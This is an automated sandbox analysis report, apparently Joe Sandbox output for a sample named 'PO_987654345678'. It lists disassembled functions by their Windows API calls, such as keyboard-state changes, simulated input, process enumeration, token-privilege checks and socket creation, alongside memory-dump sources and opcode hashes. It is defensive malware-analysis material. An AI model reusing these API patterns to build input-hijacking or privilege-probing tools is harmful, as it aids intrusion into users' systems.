                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                          • String ID: %s%d
                          • API String ID: 1272988791-1110647743
                          • Opcode ID: eb5e9595042a457453b596e82566f4a437ef34e350a109211329ab37eb2d63c4
                          • Instruction ID: 074b492bd59ca36ac490fee690da7eb15ef0e38c2a4b96ef3a0e8d372dff32dc
                          • Opcode Fuzzy Hash: eb5e9595042a457453b596e82566f4a437ef34e350a109211329ab37eb2d63c4
                          • Instruction Fuzzy Hash: 9911AFB56002096BDF54BF70CC86FEE376AAF94304F044079B909DB292DE349949AB60
                          APIs
                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00F958C1
                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00F958EE
                          • DrawMenuBar.USER32(?), ref: 00F958FD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Menu$InfoItem$Draw
                          • String ID: 0
                          • API String ID: 3227129158-4108050209
                          • Opcode ID: 1ef14a7edaa045c0f15cbbf34203c97a75ecea26d55982fb5f77a7cbe534a972
                          • Instruction ID: fbc80f5037d1d0d4192dfc9560d081d9e3c556b417487697e767c556f6503015
                          • Opcode Fuzzy Hash: 1ef14a7edaa045c0f15cbbf34203c97a75ecea26d55982fb5f77a7cbe534a972
                          • Instruction Fuzzy Hash: 91016131900218EFEF129F11DC44BAEBBB4FB45760F148099E849D6151DB308A88FF61
                          APIs
                          • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00F5D3BF
                          • FreeLibrary.KERNEL32 ref: 00F5D3E5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AddressFreeLibraryProc
                          • String ID: GetSystemWow64DirectoryW$X64
                          • API String ID: 3013587201-2590602151
                          • Opcode ID: 4b64f8cbc63d468e98c2e8919e516524cea84f3aef91ed9ee868fb056e0d4d1d
                          • Instruction ID: b3bef9bd96a8ec347c3c9ab918fa3be4e5c6c5defa95feacc766578f999365c2
                          • Opcode Fuzzy Hash: 4b64f8cbc63d468e98c2e8919e516524cea84f3aef91ed9ee868fb056e0d4d1d
                          • Instruction Fuzzy Hash: 3CF0E522C07A219BD77153104C54BA93324AF11707F59816AEE02E2116D760CDCCBAD6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • Opcode ID: a045a83937a6cc8fa4e784f944a384ef83a0ba94b21839da093f2199104587f7
                          • Instruction ID: 39832b872592a4f95523debd9513f86c4e85b80f0e7c1b9b3d9a14548bbade7c
                          • Opcode Fuzzy Hash: a045a83937a6cc8fa4e784f944a384ef83a0ba94b21839da093f2199104587f7
                          • Instruction Fuzzy Hash: 0CC14B75A0020AEFDB14CFA8C894BAEB7B5FF48715F208598E505EB251DB31ED41EB90
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: __alldvrm$_strrchr
                          • String ID:
                          • API String ID: 1036877536-0
                          • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                          • Instruction ID: 2f68e9fa4bf9014ad13e30320fe15098e092f562d9ae8e2b17ea5a38255b7af4
                          • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                          • Instruction Fuzzy Hash: C0A14972E007869FD71ADF28C8917AEBFF4EF61370F14416DE5959B281C238A981E750
                          APIs
                          Similarity
                          • API ID: Variant$ClearInitInitializeUninitialize
                          • String ID:
                          • API String ID: 1998397398-0
                          • Opcode ID: e5270b15c0586e7e3df3f5fe81f7da24c3ab105ad2caf1ca175c861847b3c137
                          • Instruction ID: fd89616d93f88fbc1f345ea8b8f65712e758b499d9ccf34ecf51b9c4fa73dfbe
                          • Opcode Fuzzy Hash: e5270b15c0586e7e3df3f5fe81f7da24c3ab105ad2caf1ca175c861847b3c137
                          • Instruction Fuzzy Hash: CCA14F756043019FC700EF28C885A6AB7E5FF88714F088859F9499B3A6DB34FE41EB91
                          APIs
                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F9FC08,?), ref: 00F605F0
                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F9FC08,?), ref: 00F60608
                          • CLSIDFromProgID.OLE32(?,?,00000000,00F9CC40,000000FF,?,00000000,00000800,00000000,?,00F9FC08,?), ref: 00F6062D
                          • _memcmp.LIBVCRUNTIME ref: 00F6064E
                          Similarity
                          • API ID: FromProg$FreeTask_memcmp
                          • String ID:
                          • API String ID: 314563124-0
                          • Opcode ID: 51660ddb3431116df5e9d89cd705aca5022a7f85994b56d1e13f7c6d68e5560e
                          • Instruction ID: dfb5d83ae9a5f614eff3d8749d05a9ceb13ce515e1451f492e42f2c22bc61eb0
                          • Opcode Fuzzy Hash: 51660ddb3431116df5e9d89cd705aca5022a7f85994b56d1e13f7c6d68e5560e
                          • Instruction Fuzzy Hash: 1D810975A00109EFCB04DF94C984EEEB7B9FF89315F244558E506AB250DB71AE06DF60
                          APIs
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 7afab70d2620459fd7ed47ba8be265b2bfc37ce2d6ab84c3986227ab57d4ec88
                          • Instruction ID: 4642fac6dd9bb3cdfe6fe25fdb9c5e956a47653c1c9f8c76bd846ee8d5860dc2
                          • Opcode Fuzzy Hash: 7afab70d2620459fd7ed47ba8be265b2bfc37ce2d6ab84c3986227ab57d4ec88
                          • Instruction Fuzzy Hash: A441E536A00514ABDB21EBF9AC45AAE3EB4FF43770F144225FC19D61E2E77888C17661
                          APIs
                          • GetWindowRect.USER32(0124E720,?), ref: 00F962E2
                          • ScreenToClient.USER32(?,?), ref: 00F96315
                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00F96382
                          Similarity
                          • API ID: Window$ClientMoveRectScreen
                          • String ID:
                          • API String ID: 3880355969-0
                          • Opcode ID: 3fad146a5cd97624422691c37e790b41be172d4ef47a5d02d1da8c2e7c3614f1
                          • Instruction ID: 0d57b327ac7291985d10b265d5f6fdf2877a3130216dd7190e37ca95b787b356
                          • Opcode Fuzzy Hash: 3fad146a5cd97624422691c37e790b41be172d4ef47a5d02d1da8c2e7c3614f1
                          • Instruction Fuzzy Hash: A8510A75A00209AFEF11DF68D990EAE7BB6FB45360F10815AF915DB290D730ED81EB90
                          APIs
                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00F81AFD
                          • WSAGetLastError.WSOCK32 ref: 00F81B0B
                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F81B8A
                          • WSAGetLastError.WSOCK32 ref: 00F81B94
                          Similarity
                          • API ID: ErrorLast$socket
                          • String ID:
                          • API String ID: 1881357543-0
                          • Opcode ID: 5a0972e76c394a13025db4969511061d0e80563be83e24c5af55c62883711a9c
                          • Instruction ID: 735d79220452959bb970f68ea431f52c9a9193bfcaf20810590b0f05f96de25d
                          • Opcode Fuzzy Hash: 5a0972e76c394a13025db4969511061d0e80563be83e24c5af55c62883711a9c
                          • Instruction Fuzzy Hash: 7341D334600200AFE720AF24CC86F6577E5AB84718F548598F91A9F3D2D776ED82AB90
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f62beb91ed06550f6a11e6133c1aa0d143a93a7fcd9e5cce05ea0963430df6fc
                          • Instruction ID: 673281d7ebcda15e28a50de8b2ab857380a9746daa4a53ba17aecbe69632431c
                          • Opcode Fuzzy Hash: f62beb91ed06550f6a11e6133c1aa0d143a93a7fcd9e5cce05ea0963430df6fc
                          • Instruction Fuzzy Hash: B0411776E00314BFD724DF78CC51B6ABBE9EB88730F10462AF641DB282D775A941A790
                          APIs
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F75783
                          • GetLastError.KERNEL32(?,00000000), ref: 00F757A9
                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F757CE
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F757FA
                          Similarity
                          • API ID: CreateHardLink$DeleteErrorFileLast
                          • String ID:
                          • API String ID: 3321077145-0
                          • Opcode ID: b68f132eb41715faa0a28cdcb5f11246e95dca482cc03b5c0a04cd70ac838bd1
                          • Instruction ID: 9dd5c21c17589b09d4ed58882a515957a90d8b1c542ef8282204c7e8938187c8
                          • Opcode Fuzzy Hash: b68f132eb41715faa0a28cdcb5f11246e95dca482cc03b5c0a04cd70ac838bd1
                          • Instruction Fuzzy Hash: F6414135600610DFCB11EF15C844A5DBBF2EF49720B19C489E84A9B3A6CB74FD41EB92
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00F26D71,00000000,00000000,00F282D9,?,00F282D9,?,00000001,00F26D71,8BE85006,00000001,00F282D9,00F282D9), ref: 00F3D910
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F3D999
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00F3D9AB
                          • __freea.LIBCMT ref: 00F3D9B4
                            • Part of subcall function 00F33820: RtlAllocateHeap.NTDLL(00000000,?,00FD1444,?,00F1FDF5,?,?,00F0A976,00000010,00FD1440,00F013FC,?,00F013C6,?,00F01129), ref: 00F33852
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                          • String ID:
                          • API String ID: 2652629310-0
                          • Opcode ID: 3c7e8c3a0318ca10cd0348bd4efc8fd183b505e72f664f5d610d66264842c137
                          • Instruction ID: 6454c61f5eb3b3e7939d23fa53a67c77b52ff1c0c0e323a0136e5892ca507871
                          • Opcode Fuzzy Hash: 3c7e8c3a0318ca10cd0348bd4efc8fd183b505e72f664f5d610d66264842c137
                          • Instruction Fuzzy Hash: 3931CF72E0121AABDF25DF64EC41EAE7BA5EB40720F054169FC04D7251EB39DD50EBA0
                          APIs
                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00F95352
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F95375
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F95382
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F953A8
                          Similarity
                          • API ID: LongWindow$InvalidateMessageRectSend
                          • String ID:
                          • API String ID: 3340791633-0
                          • Opcode ID: 654704ea940574f38c152f948d590502052fd666c1a54d77069b33be241ddca7
                          • Instruction ID: efa88a1815aa2796fc7fd663af803ba9c8fd9b5398243246fe3f11d3a74e1339
                          • Opcode Fuzzy Hash: 654704ea940574f38c152f948d590502052fd666c1a54d77069b33be241ddca7
                          • Instruction Fuzzy Hash: BE31D035E55A0CEFFF369B54CC15FE83763AB04BA0F584102FA14961E1C7B19980BB82
                          APIs
                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00F6ABF1
                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F6AC0D
                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F6AC74
                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00F6ACC6
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: 029c8358fd38cb6bca924349bc9220fe25cf1812ce5fc8816a3306672196a96e
                          • Instruction ID: c23cb9a5073cdd7ee718a411013ff3ea7fe7918d6b67c842d2fc4a3ac7567352
                          • Opcode Fuzzy Hash: 029c8358fd38cb6bca924349bc9220fe25cf1812ce5fc8816a3306672196a96e
                          • Instruction Fuzzy Hash: 0F310731E047186FEF35CB658C04BFA7BB5AB89320F04431AE485A21D1C379D985BFA2
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 00F9769A
                          • GetWindowRect.USER32(?,?), ref: 00F97710
                          • PtInRect.USER32(?,?,00F98B89), ref: 00F97720
                          • MessageBeep.USER32(00000000), ref: 00F9778C
                          Similarity
                          • API ID: Rect$BeepClientMessageScreenWindow
                          • String ID:
                          • API String ID: 1352109105-0
                          • Opcode ID: fea80673bf10bc2689e3ab29e28457b0c9f18aa6315199da466867c60fc7c5de
                          • Instruction ID: 294c23e71b7be2c3ac7c7c23419d70c6d8cfd23627a04d1e32fb074ad74aa7cb
                          • Opcode Fuzzy Hash: fea80673bf10bc2689e3ab29e28457b0c9f18aa6315199da466867c60fc7c5de
                          • Instruction Fuzzy Hash: 0F41A035A15318EFEF01EFA8C894EA9BBF5FB49310F1540A9E4149B261C331A941EF92
                          APIs
                          • GetForegroundWindow.USER32 ref: 00F916EB
                            • Part of subcall function 00F63A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F63A57
                            • Part of subcall function 00F63A3D: GetCurrentThreadId.KERNEL32 ref: 00F63A5E
                            • Part of subcall function 00F63A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F625B3), ref: 00F63A65
                          • GetCaretPos.USER32(?), ref: 00F916FF
                          • ClientToScreen.USER32(00000000,?), ref: 00F9174C
                          • GetForegroundWindow.USER32 ref: 00F91752
                          Similarity
                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                          • String ID:
                          • API String ID: 2759813231-0
                          • Opcode ID: 290eab5e81097eb40cb7073c4b848757a42354e0f167b0f8758114350b0231b6
                          • Instruction ID: 9637ffd21acf26b613ede57dbdb70287ed5f465b02a1196536fa6b62f326b777
                          • Opcode Fuzzy Hash: 290eab5e81097eb40cb7073c4b848757a42354e0f167b0f8758114350b0231b6
                          • Instruction Fuzzy Hash: 62314175D00249AFDB00EFA9C881CAEB7F9EF48304B5480AAE415E7251DB359E45EBA1
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00F6D501
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00F6D50F
                          • Process32NextW.KERNEL32(00000000,?), ref: 00F6D52F
                          • CloseHandle.KERNEL32(00000000), ref: 00F6D5DC
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: b974c8f6c0882a927be557b43531195bea4bfb0b9304b1123e4da4efe5e35d5a
                          • Instruction ID: 9c542ad56c8cce9c5ce32673eb9d88c5a86713f4102b6c958d13638ec359129b
                          • Opcode Fuzzy Hash: b974c8f6c0882a927be557b43531195bea4bfb0b9304b1123e4da4efe5e35d5a
                          • Instruction Fuzzy Hash: 2E31B4725083009FD300EF54CC81AAFBBF8EF99354F54092DF582871A2EB719944EBA2
                          APIs
                            • Part of subcall function 00F19BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F19BB2
                          • GetCursorPos.USER32(?), ref: 00F99001
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F57711,?,?,?,?,?), ref: 00F99016
                          • GetCursorPos.USER32(?), ref: 00F9905E
                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F57711,?,?,?), ref: 00F99094
                          Similarity
                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                          • String ID:
                          • API String ID: 2864067406-0
                          • Opcode ID: ece57ed00c3b7ee3822233d0dfc18d676a8f13af10bf76db4784caef63581231
                          • Instruction ID: b1a98f568f98305e4b48293100a2c49ae84b678039b52ec11e3c45aaa464358c
                          • Opcode Fuzzy Hash: ece57ed00c3b7ee3822233d0dfc18d676a8f13af10bf76db4784caef63581231
                          • Instruction Fuzzy Hash: EA218035604018BFEF258FA9CC58EEA7BB9FB49360F05405AF51547271C37299A0FBA0
                          APIs
                          • GetFileAttributesW.KERNEL32(?,00F9CB68), ref: 00F6D2FB
                          • GetLastError.KERNEL32 ref: 00F6D30A
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F6D319
                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F9CB68), ref: 00F6D376
                          Similarity
                          • API ID: CreateDirectory$AttributesErrorFileLast
                          • String ID:
                          • API String ID: 2267087916-0
                          • Opcode ID: 7485e70a3b5ecd1acbc76292b41ca4e262d34032ca3abc464a190a7885ef93dc
                          • Instruction ID: f478ab54ccd6db70717dac21188b43b343a6d154cdac6ef65eb4d5344ebab26b
                          • Opcode Fuzzy Hash: 7485e70a3b5ecd1acbc76292b41ca4e262d34032ca3abc464a190a7885ef93dc
                          • Instruction Fuzzy Hash: EB217170A092019FC710DF24C98286A77E8AE55368F504A1DF499C73E2E731D945EB93
                          APIs
                            • Part of subcall function 00F61014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F6102A
                            • Part of subcall function 00F61014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F61036
                            • Part of subcall function 00F61014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F61045
                            • Part of subcall function 00F61014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F6104C
                            • Part of subcall function 00F61014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F61062
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F615BE
                          • _memcmp.LIBVCRUNTIME ref: 00F615E1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F61617
                          • HeapFree.KERNEL32(00000000), ref: 00F6161E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Similarity
                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                          • String ID:
                          • API String ID: 1592001646-0
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 00F9280A
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F92824
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F92832
                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F92840
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Similarity
                          • API ID: Window$Long$AttributesLayered
                          • String ID:
                          • API String ID: 2169480361-0
                          APIs
                            • Part of subcall function 00F68D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00F6790A,?,000000FF,?,00F68754,00000000,?,0000001C,?,?), ref: 00F68D8C
                            • Part of subcall function 00F68D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00F68DB2
                            • Part of subcall function 00F68D7D: lstrcmpiW.KERNEL32(00000000,?,00F6790A,?,000000FF,?,00F68754,00000000,?,0000001C,?,?), ref: 00F68DE3
                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00F68754,00000000,?,0000001C,?,?,00000000), ref: 00F67923
                          • lstrcpyW.KERNEL32(00000000,?), ref: 00F67949
                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F68754,00000000,?,0000001C,?,?,00000000), ref: 00F67984
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Similarity
                          • API ID: lstrcmpilstrcpylstrlen
                          • String ID: cdecl
                          • API String ID: 4031866154-3896280584
                          APIs
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F97D0B
                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00F97D2A
                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F97D42
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F7B7AD,00000000), ref: 00F97D6B
                            • Part of subcall function 00F19BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F19BB2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Similarity
                          • API ID: Window$Long
                          • String ID:
                          • API String ID: 847901565-0
                          APIs
                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 00F956BB
                          • _wcslen.LIBCMT ref: 00F956CD
                          • _wcslen.LIBCMT ref: 00F956D8
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F95816
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Similarity
                          • API ID: MessageSend_wcslen
                          • String ID:
                          • API String ID: 455545452-0
                          APIs
                          • SetTextColor.GDI32(?,?), ref: 00F198D6
                          • SetBkMode.GDI32(?,00000001), ref: 00F198E9
                          • GetStockObject.GDI32(00000005), ref: 00F198F1
                          • GetWindowLongW.USER32(?,000000EB), ref: 00F19952
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Similarity
                          • API ID: ColorLongModeObjectStockTextWindow
                          • String ID:
                          • API String ID: 2960364272-0
                          APIs
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00F61A47
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F61A59
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F61A6F
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F61A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00F6E1FD
                          • MessageBoxW.USER32(?,?,?,?), ref: 00F6E230
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F6E246
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F6E24D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Similarity
                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                          • String ID:
                          • API String ID: 2880819207-0
                          APIs
                          • CreateThread.KERNEL32(00000000,?,00F2CFF9,00000000,00000004,00000000), ref: 00F2D218
                          • GetLastError.KERNEL32 ref: 00F2D224
                          • __dosmaperr.LIBCMT ref: 00F2D22B
                          • ResumeThread.KERNEL32(00000000), ref: 00F2D249
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Similarity
                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                          • String ID:
                          • API String ID: 173952441-0
                          APIs
                            • Part of subcall function 00F19BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F19BB2
                          • GetClientRect.USER32(?,?), ref: 00F99F31
                          • GetCursorPos.USER32(?), ref: 00F99F3B
                          • ScreenToClient.USER32(?,?), ref: 00F99F46
                          • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00F99F7A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Similarity
                          • API ID: Client$CursorLongProcRectScreenWindow
                          • String ID:
                          • API String ID: 4127811313-0
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F0604C
                          • GetStockObject.GDI32(00000011), ref: 00F06060
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F0606A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Similarity
                          • API ID: CreateMessageObjectSendStockWindow
                          • String ID:
                          • API String ID: 3970641297-0
                          APIs
                          • ___BuildCatchObject.LIBVCRUNTIME ref: 00F23B56
                            • Part of subcall function 00F23AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00F23AD2
                            • Part of subcall function 00F23AA3: ___AdjustPointer.LIBCMT ref: 00F23AED
                          • _UnwindNestedFrames.LIBCMT ref: 00F23B6B
                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00F23B7C
                          • CallCatchBlock.LIBVCRUNTIME ref: 00F23BA4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Similarity
                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                          • String ID:
                          • API String ID: 737400349-0
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00F013C6,00000000,00000000,?,00F3301A,00F013C6,00000000,00000000,00000000,?,00F3328B,00000006,FlsSetValue), ref: 00F330A5
                          • GetLastError.KERNEL32(?,00F3301A,00F013C6,00000000,00000000,00000000,?,00F3328B,00000006,FlsSetValue,00FA2290,FlsSetValue,00000000,00000364,?,00F32E46), ref: 00F330B1
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F3301A,00F013C6,00000000,00000000,00000000,?,00F3328B,00000006,FlsSetValue,00FA2290,FlsSetValue,00000000), ref: 00F330BF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00F6747F
                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F67497
                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F674AC
                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F674CA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Similarity
                          • API ID: Type$Register$FileLoadModuleNameUser
                          • String ID:
                          • API String ID: 1352324309-0
                          APIs
